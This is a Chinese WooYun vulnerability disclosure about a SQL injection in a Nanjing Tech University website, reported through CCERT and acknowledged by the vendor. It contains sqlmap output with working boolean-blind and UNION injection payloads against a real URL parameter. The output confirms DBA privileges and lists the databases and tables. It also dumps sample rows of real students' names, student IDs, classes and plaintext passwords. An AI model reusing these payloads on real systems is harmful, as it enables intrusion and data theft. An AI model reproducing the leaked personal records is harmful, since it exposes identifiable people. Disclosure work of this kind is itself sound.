当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168974

漏洞标题:南京工业大学某站SQL注入/DBA权限/上万学生信息

相关厂商:南京工业大学

漏洞作者: 路人甲

提交时间:2016-01-13 16:57

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

详细说明:

目标站点:南京工业大学社会实践专题网站 http://**.**.**.**
注入点:http://**.**.**.**/index.php/shsj/Article/article?id=1488&furl=&fname=

sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=715 AND 1515=1515&furl=&fname=
Type: UNION query
Title: MySQL UNION query (15) - 19 columns
Payload: id=-3392 UNION ALL SELECT 15,15,15,15,15,CONCAT(0x716a6a6271,0x4d6851547561666d494f,0x7171717171),15,15,15,15,15,15,15,15,15,15,15,15,15#&furl=&fname=
---
web server operating system: Windows
web application technology: PHP 5.6.3, Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
current database: 'cyl'
current user is DBA: True
available databases [8]:
[*] cdcol
[*] cyl
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth


DBA权限的!!

Database: cyl
+-------------+---------+
| Table | Entries |
+-------------+---------+
| qgx_user | 26155 |
| article | 1800 |
| qgx_answer | 417 |
| qgx_exam | 100 |
| t_lanmu_org | 91 |
| auth_org | 42 |
| lanmu | 36 |
| t_menu_org | 28 |
| params | 23 |
| menu | 15 |
| auth_rule | 2 |
+-------------+---------+


两万多学生的信息泄露了:

+-----+-------------+------+------------+------------+-----------+-------------+
| id | studentID | sex | clazz | college | realname | password |
+-----+-------------+------+------------+------------+-----------+-------------+
| 2 | 2202090125 | NULL | 2202090125 | 2202090125 | wangqiyue | 2202090125 |
| 3 | 1 | NULL | 1 | 1 | 吴老师 | 1 |
| 4 | T2201110534 | 男 | 浦工管1105 | 浦工管1105 | 吴贝文 | T2201110534 |
| 5 | T1601110425 | 男 | 浦建筑1104 | 浦建筑1104 | 葛梦阳 | T1601110425 |
| 6 | T1001110938 | 男 | 浦化工1109 | 浦化工1109 | 么贺祥 | T1001110938 |
| 7 | P3801110427 | 男 | 浦食品1104 | 浦食品1104 | 王兆文 | P3801110427 |
| 8 | P3801110424 | 男 | 浦食品1104 | 浦食品1104 | 沈久久 | P3801110424 |
| 9 | P3801110423 | 男 | 浦食品1104 | 浦食品1104 | 钱律锟 | P3801110423 |
| 10 | P3801110422 | 男 | 浦食品1104 | 浦食品1104 | 刘海洋 | P3801110422 |


只放一部分证明。

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-01-14 09:03

厂商回复:

通知处理中

最新状态:

暂无


漏洞评价:

评价